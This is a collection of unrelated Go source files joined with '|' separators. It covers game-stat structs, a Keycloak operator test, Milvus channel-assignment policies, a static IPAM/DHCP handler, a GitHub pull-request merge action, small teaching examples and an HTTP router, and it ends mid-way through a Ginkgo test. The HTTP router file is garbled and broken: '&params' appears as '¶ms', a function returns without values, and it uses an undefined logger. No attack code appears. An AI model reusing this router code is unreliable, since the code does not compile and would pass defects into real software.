MatchId int64 `json:"match_id"`
Against *Team `json:"against"` // Declared as pointer to avoid invalid recursive type
}
// DotaPlayerAgainst is a grouping of PlayerAgainst and a Hero
type DotaPlayerAgainst struct {
PlayerAgainst
Hero Hero `json:"hero"`
}
type LolTeamAgainst struct {
Value float64 `json:"value"`
MatchId int64 `json:"match_id"`
Against Roster `json:"against"`
}
type LolPlayerAgainst struct {
Value float64 `json:"value"`
PlayerId int64 `json:"player_id"`
MatchId int64 `json:"match_id"`
Champion Champion `json:"champion"`
Against Roster `json:"against"`
}
// PlayerAgainst is a collection of common data when examining specific stats.
// It is grouped with the specific stat in another struct.
type PlayerAgainst struct {
PlayerId int64 `json:"player_id"`
Against *Team `json:"against"` // Declared as pointer to avoid invalid recursive type
MatchId int64 `json:"match_id"`
}
// DotaHeroWithAmount holds information about a Dota Hero and an integer representing
// and amount (e.g amount of times picked).
type DotaHeroWithWins struct {
Amount int64 `json:"amount"`
Wins int64 `json:"wins"`
Hero Hero `json:"hero"`
}
|
package keycloak
import (
"context"
"math/rand"
"reflect"
"strconv"
"testing"
keycloakv1alpha1 "github.com/agilesolutions/operator/apis/keycloak/v1alpha1"
appsv1 "k8s.io/api/apps/v1"
corev1 "k8s.io/api/core/v1"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/apimachinery/pkg/runtime"
"k8s.io/apimachinery/pkg/types"
"k8s.io/client-go/kubernetes/scheme"
"sigs.k8s.io/controller-runtime/pkg/client/fake"
"sigs.k8s.io/controller-runtime/pkg/reconcile"
logf "sigs.k8s.io/controller-runtime/pkg/runtime/log"
)
// TestKeycloakController runs ReconcileKeycloak.Reconcile() against a
// fake client that tracks a Keycloak object.
func TestKeycloakController(t *testing.T) {
// Set the logger to development mode for verbose logs.
logf.SetLogger(logf.ZapLogger(true))
var (
name = "keycloak-operator"
namespace = "keycloak"
replicas int32 = 3
)
// A Keycloak resource with metadata and spec.
keycloak := &keycloakv1alpha1.Keycloak{
ObjectMeta: metav1.ObjectMeta{
Name: name,
Namespace: namespace,
},
Spec: keycloakv1alpha1.KeycloakSpec{
Size: replicas, // Set desired number of Keycloak replicas.
},
}
// Objects to track in the fake client.
objs := []runtime.Object{
keycloak,
}
// Register operator types with the runtime scheme.
s := scheme.Scheme
s.AddKnownTypes(keycloakv1alpha1.SchemeGroupVersion, keycloak)
// Create a fake client to mock API calls.
cl := fake.NewFakeClient(objs...)
// Create a ReconcileKeycloak object with the scheme and fake client.
r := &ReconcileKeycloak{client: cl, scheme: s}
// Mock request to simulate Reconcile() being called on an event for a
// watched resource .
req := reconcile.Request{
NamespacedName: types.NamespacedName{
Name: name,
Namespace: namespace,
},
}
res, err := r.Reconcile(req)
if err != nil {
t.Fatalf("reconcile: (%v)", err)
}
// Check the result of reconciliation to make sure it has the desired state.
if !res.Requeue {
t.Error("reconcile did not requeue request as expected")
}
// Check if Deployment has been created and has the correct size.
dep := &appsv1.Deployment{}
err = cl.Get(context.TODO(), req.NamespacedName, dep)
if err != nil {
t.Fatalf("get deployment: (%v)", err)
}
dsize := *dep.Spec.Replicas
if dsize != replicas {
t.Errorf("dep size (%d) is not the expected size (%d)", dsize, replicas)
}
res, err = r.Reconcile(req)
if err != nil {
t.Fatalf("reconcile: (%v)", err)
}
// Check the result of reconciliation to make sure it has the desired state.
if res.Requeue {
t.Error("reconcile requeue which is not expected")
}
// Check if Service has been created.
ser := &corev1.Service{}
err = cl.Get(context.TODO(), req.NamespacedName, ser)
if err != nil {
t.Fatalf("get service: (%v)", err)
}
// Create the 3 expected pods in namespace and collect their names to check
// later.
podLabels := labelsForKeycloak(name)
pod := corev1.Pod{
ObjectMeta: metav1.ObjectMeta{
Namespace: namespace,
Labels: podLabels,
},
}
podNames := make([]string, 3)
for i := 0; i < 3; i++ {
pod.ObjectMeta.Name = name + ".pod." + strconv.Itoa(rand.Int())
podNames[i] = pod.ObjectMeta.Name
if err = cl.Create(context.TODO(), pod.DeepCopy()); err != nil {
t.Fatalf("create pod %d: (%v)", i, err)
}
}
// Reconcile again so Reconcile() checks pods and updates the Keycloak
// resources' Status.
res, err = r.Reconcile(req)
if err != nil {
t.Fatalf("reconcile: (%v)", err)
}
if res != (reconcile.Result{}) {
t.Error("reconcile did not return an empty Result")
}
// Get the updated Keycloak object.
keycloak = &keycloakv1alpha1.Keycloak{}
err = r.client.Get(context.TODO(), req.NamespacedName, keycloak)
if err != nil {
t.Errorf("get keycloak: (%v)", err)
}
// Ensure Reconcile() updated the Keycloak's Status as expected.
nodes := keycloak.Status.Nodes
if !reflect.DeepEqual(podNames, nodes) {
t.Errorf("pod names %v did not match expected %v", nodes, podNames)
}
}
|
package server
import (
"time"
"github.com/elhamza90/lifelog/internal/domain"
)
// JSONReqActivity is used to unmarshal a json activity
type JSONReqActivity struct {
ID domain.ActivityID `json:"id"`
Label string `json:"label"`
Desc string `json:"desc"`
Place string `json:"place"`
Time time.Time `json:"time"`
Duration time.Duration `json:"duration"`
TagIds []domain.TagID `json:"tagIds"`
}
// ToDomain constructs and returns a domain.Activity from a JSONReqActivity
func (reqAct JSONReqActivity) ToDomain() domain.Activity {
// Construct Tags slice from ids ( don't fetch anything )
tags := []domain.Tag{}
for _, id := range reqAct.TagIds {
tags = append(tags, domain.Tag{ID: id})
}
// Call adding service
return domain.Activity{
ID: reqAct.ID,
Label: reqAct.Label,
Desc: reqAct.Desc,
Place: reqAct.Place,
Time: reqAct.Time,
Duration: reqAct.Duration,
Tags: tags,
}
}
// JSONRespDetailActivity is used to marshal an activity to json
type JSONRespDetailActivity struct {
ID domain.ActivityID `json:"id"`
Label string `json:"label"`
Desc string `json:"desc"`
Place string `json:"place"`
Time time.Time `json:"time"`
Duration time.Duration `json:"duration"`
Expenses []JSONRespListExpense `json:"expenses"`
Tags []domain.Tag `json:"tags"`
}
// From constructs a JSONRespDetailActivity object from a domain.Activity object
func (respAct *JSONRespDetailActivity) From(act domain.Activity, expenses []domain.Expense) {
(*respAct).ID = act.ID
(*respAct).Label = act.Label
(*respAct).Place = act.Place
(*respAct).Desc = act.Desc
(*respAct).Time = act.Time
(*respAct).Duration = act.Duration
respExpenses := make([]JSONRespListExpense, len(expenses))
var respExp JSONRespListExpense
for i, exp := range expenses {
respExp.From(exp)
respExpenses[i] = respExp
}
(*respAct).Expenses = respExpenses
(*respAct).Tags = act.Tags
}
// JSONRespListActivity is used to marshal a list of activities to json
type JSONRespListActivity struct {
ID domain.ActivityID `json:"id"`
Label string `json:"label"`
Desc string `json:"desc"`
Place string `json:"place"`
Time time.Time `json:"time"`
Duration time.Duration `json:"duration"`
}
// From constructs a JSONRespListActivity object from a domain.Activity object
func (respAct *JSONRespListActivity) From(act domain.Activity) {
(*respAct).ID = act.ID
(*respAct).Label = act.Label
(*respAct).Place = act.Place
(*respAct).Desc = act.Desc
(*respAct).Time = act.Time
(*respAct).Duration = act.Duration
}
|
package v1
import (
"github.com/gin-gonic/gin"
_ "github.com/hukaixuan/mall-backend/pkg/e"
)
// @Summary Get user detail
// @Produce json
// @Param id path int true "ID"
// @Success 200 {string} string 200
// @Failure 500
// @Router /api/v1/users/{id} [get]
func GetUser(c *gin.Context) {
}
func Registe(c *gin.Context) {
}
func Login(c *gin.Context) {
}
func EditUser(c *gin.Context) {
}
func DeleteUser(c *gin.Context) {
}
|
// Copyright (C) 2019-2020 Zilliz. All rights reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance
// with the License. You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software distributed under the License
// is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
// or implied. See the License for the specific language governing permissions and limitations under the License.
package datacoord
import (
"crypto/rand"
"math"
"math/big"
"github.com/milvus-io/milvus/internal/log"
"github.com/milvus-io/milvus/internal/proto/datapb"
"go.uber.org/zap"
)
type clusterDeltaChange struct {
newNodes []string
offlines []string
restarts []string
}
// clusterStartupPolicy defines the behavior when datacoord starts/restarts
type clusterStartupPolicy interface {
// apply accept all nodes and new/offline/restarts nodes and returns datanodes whose status need to be changed
apply(oldCluster map[string]*datapb.DataNodeInfo, delta *clusterDeltaChange, buffer []*datapb.ChannelStatus) ([]*datapb.DataNodeInfo, []*datapb.ChannelStatus)
}
type watchRestartsStartupPolicy struct {
}
func newWatchRestartsStartupPolicy() clusterStartupPolicy {
return watchRestartStartup
}
// startup func
type startupFunc func(cluster map[string]*datapb.DataNodeInfo, delta *clusterDeltaChange,
buffer []*datapb.ChannelStatus) ([]*datapb.DataNodeInfo, []*datapb.ChannelStatus)
// implement watchRestartsStartupPolicy for startupFunc
func (f startupFunc) apply(cluster map[string]*datapb.DataNodeInfo, delta *clusterDeltaChange,
buffer []*datapb.ChannelStatus) ([]*datapb.DataNodeInfo, []*datapb.ChannelStatus) {
return f(cluster, delta, buffer)
}
var watchRestartStartup startupFunc = func(cluster map[string]*datapb.DataNodeInfo, delta *clusterDeltaChange,
buffer []*datapb.ChannelStatus) ([]*datapb.DataNodeInfo, []*datapb.ChannelStatus) {
ret := make([]*datapb.DataNodeInfo, 0)
for _, addr := range delta.restarts {
node := cluster[addr]
for _, ch := range node.Channels {
ch.State = datapb.ChannelWatchState_Uncomplete
}
ret = append(ret, node)
}
// put all channels from offline into buffer first
for _, addr := range delta.offlines {
node := cluster[addr]
for _, ch := range node.Channels {
ch.State = datapb.ChannelWatchState_Uncomplete
buffer = append(buffer, ch)
}
}
// try new nodes first
if len(delta.newNodes) > 0 && len(buffer) > 0 {
idx := 0
for len(buffer) > 0 {
node := cluster[delta.newNodes[idx%len(delta.newNodes)]]
node.Channels = append(node.Channels, buffer[0])
buffer = buffer[1:]
if idx < len(delta.newNodes) {
ret = append(ret, node)
}
idx++
}
}
// try online nodes if buffer is not empty
if len(buffer) > 0 {
online := make([]*datapb.DataNodeInfo, 0, len(cluster))
for _, node := range cluster {
online = append(online, node)
}
if len(online) > 0 {
idx := 0
for len(buffer) > 0 {
node := online[idx%len(online)]
node.Channels = append(node.Channels, buffer[0])
buffer = buffer[1:]
if idx < len(online) {
ret = append(ret, node)
}
idx++
}
}
}
return ret, buffer
}
// dataNodeRegisterPolicy defines the behavior when a datanode is registered
type dataNodeRegisterPolicy interface {
// apply accept all online nodes and new created node, returns nodes needed to be changed
apply(cluster map[string]*datapb.DataNodeInfo, session *datapb.DataNodeInfo, buffer []*datapb.ChannelStatus) ([]*datapb.DataNodeInfo, []*datapb.ChannelStatus)
}
// data node register func, simple func wrapping policy
type dataNodeRegisterFunc func(cluster map[string]*datapb.DataNodeInfo, session *datapb.DataNodeInfo, buffer []*datapb.ChannelStatus) ([]*datapb.DataNodeInfo, []*datapb.ChannelStatus)
// implement dataNodeRegisterPolicy for dataNodeRegisterFunc
func (f dataNodeRegisterFunc) apply(cluster map[string]*datapb.DataNodeInfo, session *datapb.DataNodeInfo,
buffer []*datapb.ChannelStatus) ([]*datapb.DataNodeInfo, []*datapb.ChannelStatus) {
return f(cluster, session, buffer)
}
// test logic, register and do nothing
var emptyRegister dataNodeRegisterFunc = func(cluster map[string]*datapb.DataNodeInfo, session *datapb.DataNodeInfo,
buffer []*datapb.ChannelStatus) ([]*datapb.DataNodeInfo, []*datapb.ChannelStatus) {
return []*datapb.DataNodeInfo{session}, buffer
}
// assign existing buffered channels into newly registered data node session
var registerAssignWithBuffer dataNodeRegisterFunc = func(cluster map[string]*datapb.DataNodeInfo, session *datapb.DataNodeInfo,
buffer []*datapb.ChannelStatus) ([]*datapb.DataNodeInfo, []*datapb.ChannelStatus) {
session.Channels = append(session.Channels, buffer...)
return []*datapb.DataNodeInfo{session}, []*datapb.ChannelStatus{}
}
func newEmptyRegisterPolicy() dataNodeRegisterPolicy {
return emptyRegister
}
func newAssiggBufferRegisterPolicy() dataNodeRegisterPolicy {
return registerAssignWithBuffer
}
// dataNodeUnregisterPolicy defines the behavior when datanode unregisters
type dataNodeUnregisterPolicy interface {
// apply accept all online nodes and unregistered node, returns nodes needed to be changed
apply(cluster map[string]*datapb.DataNodeInfo, session *datapb.DataNodeInfo) []*datapb.DataNodeInfo
}
// unregisterNodeFunc, short cut for functions implement policy
type unregisterNodeFunc func(cluster map[string]*datapb.DataNodeInfo, session *datapb.DataNodeInfo) []*datapb.DataNodeInfo
// implement dataNodeUnregisterPolicy for unregisterNodeFunc
func (f unregisterNodeFunc) apply(cluster map[string]*datapb.DataNodeInfo, session *datapb.DataNodeInfo) []*datapb.DataNodeInfo {
return f(cluster, session)
}
// test logic, do nothing when node unregister
var emptyUnregisterFunc unregisterNodeFunc = func(cluster map[string]*datapb.DataNodeInfo, session *datapb.DataNodeInfo) []*datapb.DataNodeInfo {
return nil
}
// randomly assign channels from unregistered node into existing nodes
// if there is no nodes online, this func will not be invoked, buffer will be filled outside this func
var randomAssignRegisterFunc unregisterNodeFunc = func(cluster map[string]*datapb.DataNodeInfo, session *datapb.DataNodeInfo) []*datapb.DataNodeInfo {
if len(cluster) == 0 || // no available node
session == nil ||
len(session.Channels) == 0 { // lost node not watching any channels
return []*datapb.DataNodeInfo{}
}
appliedNodes := make([]*datapb.DataNodeInfo, 0, len(session.Channels))
raResult := make(map[int][]*datapb.ChannelStatus)
for _, chanSt := range session.Channels {
bIdx, err := rand.Int(rand.Reader, big.NewInt(int64(len(cluster))))
if err != nil {
log.Error("error generated rand idx", zap.Error(err))
return []*datapb.DataNodeInfo{}
}
idx := bIdx.Int64()
if int(idx) >= len(cluster) {
continue
}
cs, ok := raResult[int(idx)]
if !ok {
cs = make([]*datapb.ChannelStatus, 0, 10)
}
chanSt.State = datapb.ChannelWatchState_Uncomplete
cs = append(cs, chanSt)
raResult[int(idx)] = cs
}
i := 0
for _, node := range cluster {
cs, ok := raResult[i]
i++
if ok {
node.Channels = append(node.Channels, cs...)
appliedNodes = append(appliedNodes, node)
}
}
return appliedNodes
}
func newEmptyUnregisterPolicy() dataNodeUnregisterPolicy {
return emptyUnregisterFunc
}
// channelAssignPolicy defines the behavior when a new channel needs to be assigned
type channelAssignPolicy interface {
// apply accept all online nodes and new created channel with collectionID, returns node needed to be changed
apply(cluster map[string]*datapb.DataNodeInfo, channel string, collectionID UniqueID) []*datapb.DataNodeInfo
}
// channelAssignFunc, function shortcut for policy
type channelAssignFunc func(cluster map[string]*datapb.DataNodeInfo, channel string, collectionID UniqueID) []*datapb.DataNodeInfo
// implement channelAssignPolicy for channelAssign func
func (f channelAssignFunc) apply(cluster map[string]*datapb.DataNodeInfo, channel string, collectionID UniqueID) []*datapb.DataNodeInfo {
return f(cluster, channel, collectionID)
}
// deprecated
// test logic, assign channel to all existing data node, works fine only when there is only one data node!
var assignAllFunc channelAssignFunc = func(cluster map[string]*datapb.DataNodeInfo, channel string, collectionID UniqueID) []*datapb.DataNodeInfo {
ret := make([]*datapb.DataNodeInfo, 0)
for _, node := range cluster {
has := false
for _, ch := range node.Channels {
if ch.Name == channel {
has = true
break
}
}
if has {
continue
}
node.Channels = append(node.Channels, &datapb.ChannelStatus{
Name: channel,
State: datapb.ChannelWatchState_Uncomplete,
CollectionID: collectionID,
})
ret = append(ret, node)
}
return ret
}
// balanced assign channel, select the datanode with least amount of channels to assign
var balancedAssignFunc channelAssignFunc = func(cluster map[string]*datapb.DataNodeInfo, channel string, collectionID UniqueID) []*datapb.DataNodeInfo {
if len(cluster) == 0 {
return []*datapb.DataNodeInfo{}
}
// filter existed channel
for _, node := range cluster {
for _, c := range node.GetChannels() {
if c.GetName() == channel && c.GetCollectionID() == collectionID {
return nil
}
}
}
target, min := "", math.MaxInt32
for k, v := range cluster {
if len(v.GetChannels()) < min {
target = k
min = len(v.GetChannels())
}
}
ret := make([]*datapb.DataNodeInfo, 0)
cluster[target].Channels = append(cluster[target].Channels, &datapb.ChannelStatus{
Name: channel,
State: datapb.ChannelWatchState_Uncomplete,
CollectionID: collectionID,
})
ret = append(ret, cluster[target])
return ret
}
func newAssignAllPolicy() channelAssignPolicy {
return assignAllFunc
}
func newBalancedAssignPolicy() channelAssignPolicy {
return balancedAssignFunc
}
|
package main
import (
"bufio"
"fmt"
"math"
"os"
"strconv"
)
var in = bufio.NewScanner(os.Stdin)
/**
* https://open.kattis.com/problems/rationalsequence3
*/
func main() {
in.Split(bufio.ScanWords)
N := NextInt()
for i := 1; i <= N; i++ {
NextInt()
p, q := Solve(NextInt())
fmt.Printf("%d %d/%d\n", i, p, q)
}
}
func Solve(n int) (uint, uint) {
level := int(math.Floor(math.Log2(float64(n))))
levelVal := int(math.Pow(2, float64(level)))
p, q := uint(1), uint(1)
levelVal /= 2
for ; levelVal > 0; levelVal /= 2 {
if levelVal&n == 0 { //left
q += p
} else { // right
p += q
}
}
return p, q
}
func NextInt() int {
in.Scan()
tmp, _ := strconv.Atoi(in.Text())
return tmp
}
|
package ipam
import (
"encoding/json"
"fmt"
"net"
"os"
"strings"
"github.com/nik-johnson-net/rackdirector/pkg/dhcpd"
)
type HostAddressInfo struct {
Hostname string
Address net.IP
Network net.IPNet
Gateway net.IP
DNS []net.IP
DomainSearch string
}
type jsonIpamInterface struct {
Device string
Port string
Ipv4 string
Ipv4Gateway string `json:"ipv4_gateway"`
}
type jsonIpamBmc struct {
Hostname string
Port string
Ipv4 string
Ipv4Gateway string `json:"ipv4_gateway"`
}
type jsonIpamHost struct {
Hostname string
Interfaces []jsonIpamInterface
Bmc jsonIpamBmc
}
type jsonIpamConfig struct {
Hosts []jsonIpamHost
}
type BMC struct {
Hostname string
Port string
Ipv4 net.IP
Network net.IPNet
Ipv4Gateway net.IP
}
type Interface struct {
Device string
Port string
Ipv4 net.IP
Network net.IPNet
Ipv4Gateway net.IP
}
type Host struct {
Hostname string
Interfaces []Interface
Bmc BMC
}
type ipamConfig struct {
Hosts []Host
}
func (i ipamConfig) GetHost(port string, relayIP net.IP) (Host, bool) {
for _, entry := range i.Hosts {
for _, interf := range entry.Interfaces {
if interf.Network.Contains(relayIP) && interf.Port == port {
return entry, true
}
}
if entry.Bmc.Network.Contains(relayIP) && entry.Bmc.Port == port {
return entry, true
}
}
return Host{}, false
}
func (i ipamConfig) GetHostByIP(ip net.IP) (Host, bool) {
for _, entry := range i.Hosts {
for _, interf := range entry.Interfaces {
if interf.Ipv4.Equal(ip) {
return entry, true
}
}
if entry.Bmc.Ipv4.Equal(ip) {
return entry, true
}
}
return Host{}, false
}
func (i ipamConfig) GetHostByHostname(hostname string) (Host, bool) {
for _, entry := range i.Hosts {
if entry.Hostname == hostname {
return entry, true
}
if entry.Bmc.Hostname == hostname {
return entry, true
}
}
return Host{}, false
}
type StaticIpam struct {
config ipamConfig
}
func NewFromFile(file string) *StaticIpam {
configFile, err := os.Open(file)
if err != nil {
panic(err)
}
defer configFile.Close()
decoder := json.NewDecoder(configFile)
var jsonConfig jsonIpamConfig
err = decoder.Decode(&jsonConfig)
if err != nil {
panic(err)
}
config := ipamConfig{
Hosts: make([]Host, 0),
}
for _, host := range jsonConfig.Hosts {
hostObj := Host{
Hostname: host.Hostname,
Interfaces: make([]Interface, 0),
}
for _, interf := range host.Interfaces {
ip, network, err := net.ParseCIDR(interf.Ipv4)
if err != nil {
panic(err)
}
hostObj.Interfaces = append(hostObj.Interfaces, Interface{
Device: interf.Device,
Port: interf.Port,
Ipv4: ip,
Network: *network,
Ipv4Gateway: net.ParseIP(interf.Ipv4Gateway),
})
}
ip, network, err := net.ParseCIDR(host.Bmc.Ipv4)
if err != nil {
panic(err)
}
hostObj.Bmc = BMC{
Hostname: host.Bmc.Hostname,
Port: host.Bmc.Port,
Ipv4: ip,
Network: *network,
Ipv4Gateway: net.ParseIP(host.Bmc.Ipv4Gateway),
}
config.Hosts = append(config.Hosts, hostObj)
}
fmt.Fprintf(os.Stdout, "Build database %v\n", config)
return &StaticIpam{
config: config,
}
}
func computeGateway(ip net.IPNet) net.IP {
network := ip.IP.Mask(ip.Mask)
network[3]++
return network
}
func getDomain(hostname string) string {
split := strings.SplitN(hostname, ".", 2)
return split[1]
}
func (s *StaticIpam) Handle(circuitID string, subscriberID string, macAddress net.HardwareAddr, gatewayIP net.IP) (dhcpd.DHCPResponse, error) {
if h, ok := s.config.GetHost(circuitID, gatewayIP); ok {
for _, interf := range h.Interfaces {
if interf.Port == circuitID {
return dhcpd.DHCPResponse{
IP: interf.Ipv4,
Network: interf.Network,
Gateway: interf.Ipv4Gateway,
DNS: []net.IP{net.ParseIP("1.1.1.1")},
Lease: 86400,
Hostname: h.Hostname,
DomainSearch: getDomain(h.Hostname),
TFTPServerName: "10.0.1.10",
}, nil
}
}
if h.Bmc.Port == circuitID {
return dhcpd.DHCPResponse{
IP: h.Bmc.Ipv4,
Network: h.Bmc.Network,
Gateway: h.Bmc.Ipv4Gateway,
DNS: []net.IP{net.ParseIP("1.1.1.1")},
Lease: 86400,
Hostname: h.Hostname,
DomainSearch: getDomain(h.Hostname),
}, nil
}
}
return dhcpd.DHCPResponse{}, fmt.Errorf("not found")
}
func (s *StaticIpam) Get(peer net.IP) (Host, error) {
if h, ok := s.config.GetHostByIP(peer); ok {
return h, nil
}
return Host{}, fmt.Errorf("not found")
}
func (s *StaticIpam) GetByHostname(hostname string) (Host, error) {
if h, ok := s.config.GetHostByHostname(hostname); ok {
return h, nil
}
return Host{}, fmt.Errorf("not found")
}
|
package main
import (
"path/filepath"
"testing"
)
func Test_ReadConfig(t *testing.T) {
// Path does not exit.
if _, err := ReadConfig("path-does-not-exist"); err == nil {
t.Error("expect ReadConfig to return error when reading inexistence file")
}
// Invalid JSON config file
files, err := filepath.Glob("testdata/error-*.json")
if err != nil {
t.Fatal(err)
}
for _, f := range files {
if _, err := ReadConfig(f); err == nil {
t.Errorf("expect ReadConfig to return error when reading %s", f)
}
}
// Valid JSON config file.
files, err = filepath.Glob("testdata/valid-*.json")
if err != nil {
t.Fatal(err)
}
for _, f := range files {
if _, err := ReadConfig(f); err != nil {
t.Errorf("expect ReadConfig to NOT return error when reading %s", f)
}
}
}
|
package merge
import (
"context"
"flag"
"log"
"os"
"strings"
"github.com/google/go-github/v28/github"
"github.com/variantdev/go-actions"
)
type Action struct {
BaseURL, UploadURL string
Force bool
Method string
}
type Target struct {
Owner, Repo string
PullRequest *github.PullRequest
}
func New() *Action {
return &Action{
BaseURL: "",
UploadURL: "",
}
}
func (c *Action) AddFlags(fs *flag.FlagSet) {
fs.StringVar(&c.BaseURL, "github-base-url", "", "")
fs.StringVar(&c.UploadURL, "github-upload-url", "", "")
fs.BoolVar(&c.Force, "force", false, "Merges the pull request even if required checks are NOT passing")
fs.StringVar(&c.Method, "method", "merge", ` The merge method to use. Possible values include: "merge", "squash", and "rebase" with the default being merge`)
}
func (c *Action) Run() error {
pr, owner, repo, err := actions.PullRequest()
if err != nil {
return err
}
target := &Target{
Owner: owner,
Repo: repo,
PullRequest: pr,
}
return c.MergeIfNecessary(target)
}
func (c *Action) MergeIfNecessary(pre *Target) error {
client, err := c.getClient()
if err != nil {
return err
}
owner := pre.Owner
repo := pre.Repo
num := pre.PullRequest.GetNumber()
if !c.Force {
ref := pre.PullRequest.Head.GetRef()
headBranch := strings.TrimPrefix(ref, "refs/heads")
contexts, _, err := client.Repositories.ListRequiredStatusChecksContexts(context.Background(), owner, repo, headBranch)
if err != nil {
return err
}
// TODO Pagination
statuses, _, err := client.Repositories.ListStatuses(context.Background(), owner, repo, ref, &github.ListOptions{})
if err != nil {
return err
}
reqCheckContexts := map[string]struct{}{}
for _, c := range contexts {
reqCheckContexts[c] = struct{}{}
log.Printf("Seen required status context %q", c)
}
reqChecksPassing := true
for _, st := range statuses {
log.Printf("Seen status context %q", st.GetContext())
_, ok := reqCheckContexts[st.GetContext()]
reqChecksPassing = reqChecksPassing && ok
}
if !reqChecksPassing {
return nil
}
}
log.Printf("Merging the pull request with method %q", c.Method)
_, _, mergeErr := client.PullRequests.Merge(context.Background(), owner, repo, num, "", &github.PullRequestOptions{
MergeMethod: c.Method,
})
return mergeErr
}
func (c *Action) getClient() (*github.Client, error) {
return actions.CreateClient(os.Getenv("GITHUB_TOKEN"), c.BaseURL, c.UploadURL)
}
|
package main
import (
"fmt"
"math/rand"
"time"
)
func add(c chan int) {
sum := 0
t := time.NewTimer(time.Second)
for {
select {
case input := <-c:
sum = sum + input
// time.NewTimer()를 호출할 때 지정한 시간만큼 차이머의 c 채널을 블록시킴.
// 지정된 시간이 만료되면 타이머는 t.C 채널로 값을 보냄.
// 그 후 select문에서 이와 관련된 브랜치가 실행되면서 c 채널에 nil 값을 할당한 뒤 sum 변수를 화면에 출력
case <-t.C:
c = nil
fmt.Println(sum)
}
}
}
// 채널이 열려있는 동안 지속적으로 난수를 생성해서 채널에 보냄.
func send(c chan int) {
for {
c <- rand.Intn(10)
}
}
func main() {
c := make(chan int)
go add(c)
go send(c)
// 두 개의 고루틴이 실행되는데 충분한 시간을 지정함.
time.Sleep(3 * time.Second)
} |
package main
import(
"fmt"
"math/rand"
"time"
)
func main(){
rand.Seed(time.Now().UnixNano())
n:=0
for{
n++
i:=rand.Intn(4200)
fmt.Println(i)
if i%42==0 {
break
}
}
fmt.Printf("Saída após %d iterações.\n",n)
}
/*
Quando geramos numeros aleatorios, é sempre importante configurar o valor conhecido como seed do gerador. No exemplo, usamos o timestamp
atual no formato padrão do UNIX - o número de nanossegundos desde 1º de janeiro de 1970 - para garantir que, a cada execução do programa,
o gerador de números aleatórios produza números diferentes da vez anterior.
*/
|
package error
import "errors"
var(
ErrReflectNil = errors.New("can't reflect nil pointer")
ErrReflectNonSlice = errors.New("can't reflect not slice object")
) |
package http
import (
"net/http"
"encoding/json"
"io/ioutil"
"strings"
"fmt"
"errors"
"time"
)
type HttpHandler func(params *Params)*WebResult
type Route struct{
Handler HttpHandler
Method string
Path string
Params []string
}
type Router struct{
RouteMap map[string]*Route
}
func (router *Router) ServeHTTP(w http.ResponseWriter,r *http.Request){
start:=time.Now();
log.Infof("receive %s request for %s",r.Method,r.URL.Path)
if route,ok := router.getRouter(r.URL.Path,r.Method);ok{
params,err := getParams(r,route.Params)
if err != nil{
http.Error(w,err.Error(),400)
}
if route.Params != nil || len(route.Params) > 0{
if(params == nil){
http.Error(w,"params is not format",400)
}
}
res := route.Handler(params)
writeResp(w,res)
}else{
http.NotFound(w,r)
}
dur:=time.Now().Sub(start);
log.Infof("http parse time:%d",dur.Nanoseconds())
}
func(router *Router) RegRoutes(routes []*Route){
if router.RouteMap == nil {
router.RouteMap = make(map[string]*Route)
}
for _,route := range routes{
method := strings.ToUpper(route.Method)
router.RouteMap[method+"_"+route.Path] = route
}
}
func NewRoute(path,method string,handler HttpHandler,params []string)*Route{
return &Route{Path:path,Method:method,Handler:handler,Params:params}
}
func (router *Router)getRouter(url,method string)(*Route,bool){
if router == nil {
return nil, false
}
route := router.RouteMap[method+"_"+url]
if route == nil{
return nil,false
}
return route,true
}
type Params struct {
data map[string]interface{}
}
func (p *Params) Get(key string)string{
if v,ok := p.data[key];ok{
return fmt.Sprintf("%v",v)
}else{
return ""
}
}
func getParams(r *http.Request,keys []string) (*Params,error){
if keys == nil{
return nil,nil
}
if len(keys) == 0{
return nil,nil
}
parm := &Params{}
params := make(map[string]interface{})
parm.data = params
switch r.Method{
case "GET":
r.ParseForm()
for _,key := range keys{
value := r.Form.Get(key)
if value == ""{
continue
}
params[key] = value
}
return parm,nil
case "POST":
ct := r.Header.Get("Content-Type")
switch(ct){
case "application/x-www-form-urlencoded":
r.ParseForm()
for _,k := range keys{
value := r.PostFormValue(k)
}
return
case "application/json":
result,_ := ioutil.ReadAll(r.Body)
err := json.Unmarshal(result,¶ms)
if err != nil{
return nil,err
}
if params == nil{
return nil,errors.New("params is nil")
}
parm.data = params
return parm,nil
}
break
case "PUT":
break
default:
break
}
if r.Method == "GET"{
}else{
result,_ := ioutil.ReadAll(r.Body)
err := json.Unmarshal(result,¶ms)
if err != nil{
return nil,err
}
if params == nil{
return nil,errors.New("params is nil")
}
parm.data = params
return parm,nil
}
}
func writeResp(w http.ResponseWriter,res *WebResult){
w.Header().Set("Content-Type","application/json")
b,_ := json.Marshal(res)
w.Write(b)
}
|
package server
import "github.com/go-playground/validator"
type Login struct {
Username string `validate:"required"`
Knock []int `validate:"required"`
}
func (l *Login) Validate() error {
return validator.New().Struct(l)
}
|
package decider_test
import (
"bytes"
"encoding/json"
"errors"
"io"
"log"
"net/http"
. "github.com/onsi/ginkgo/v2"
. "github.com/onsi/gomega"
"github.com/pivotal-cf/brokerapi/v10/domain"
"github.com/pivotal-cf/brokerapi/v10/domain/apiresponses"
"github.com/pivotal-cf/on-demand-service-broker/broker/decider"
"github.com/pivotal-cf/on-demand-service-broker/loggerfactory"
)
var _ = Describe("Decider", func() {
const (
planWithMI = "fake-plan-id-with-mi"
otherPlanWithMI = "fake-other-plan-id-with-mi"
planWithoutMI = "fake-plan-id-no-mi"
otherPlanWithoutMI = "fake-other-plan-id-no-mi"
)
var (
catalog []domain.Service
logBuffer *bytes.Buffer
logger *log.Logger
defaultMI *domain.MaintenanceInfo
higherMI *domain.MaintenanceInfo
)
BeforeEach(func() {
defaultMI = &domain.MaintenanceInfo{
Version: "1.2.3",
}
higherMI = &domain.MaintenanceInfo{
Version: "1.2.4",
}
catalog = []domain.Service{
{
ID: "fake-service-id",
Plans: []domain.ServicePlan{
{ID: planWithMI, MaintenanceInfo: defaultMI},
{ID: otherPlanWithMI, MaintenanceInfo: higherMI},
{ID: planWithoutMI},
{ID: otherPlanWithoutMI},
},
},
}
logBuffer = new(bytes.Buffer)
loggerFactory := loggerfactory.New(io.MultiWriter(GinkgoWriter, logBuffer), "broker-unit-tests", log.LstdFlags)
